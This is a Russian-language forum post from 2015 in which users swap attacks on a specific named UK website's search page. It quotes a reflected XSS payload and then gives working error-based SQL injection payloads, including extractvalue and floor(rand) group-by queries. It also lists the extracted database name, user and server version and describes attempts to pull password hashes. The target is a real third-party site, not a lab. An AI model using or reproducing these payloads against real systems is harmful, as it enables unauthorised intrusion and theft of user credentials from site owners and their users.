Показать сообщение отдельно

  #196  
Старый 06.10.2015, 17:36
AlexG
Познающий
Регистрация: 26.09.2015
Сообщений: 56
Провел на форуме:
11344

Репутация: 5
По умолчанию

Цитата:
Сообщение от zigen  

Target:
http://www.archetype.co.uk/search.php
Type:XSS-Reflected

Код:
">alert("OOPS")


Но там кажется можно еще и SQLi раскрутить, ошибка по строкой поиска

Вы правы:

Target: archetype.co.uk

Type:SQLi error based

Exploit:

Код:
Get: http://www.archetype.co.uk/search.php
Post-data: search=123" and extractvalue(0x0a,concat(0x0a,(select concat(version(),0x3a,database(),0x3a,current_user)))) and 1="1 -- &submit.x=91&submit.y=9&status[]=Recent&status[]=Current&status[]=Forthcoming
DB-name: archetyp_db

DB-user: archetype

Version: 5.1.73-cll

P.S. Возможно есть более изящное решение, но у меня получилось так

UPD Поковыряв руками выяснилось, что пассы в мд5 и в вывод тупо не влазят (ограничение способа в 31 символ). Нашел такое решение (лимит 64 символа):

Код:
Get: http://www.archetype.co.uk/search.php
Post-data: search=123" and (select 1 from (Select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y) x) and 1="1 -- &submit.x=91&submit.y=9&status[]=Recent&status[]=Current&status[]=Forthcoming
 
Ответить с цитированием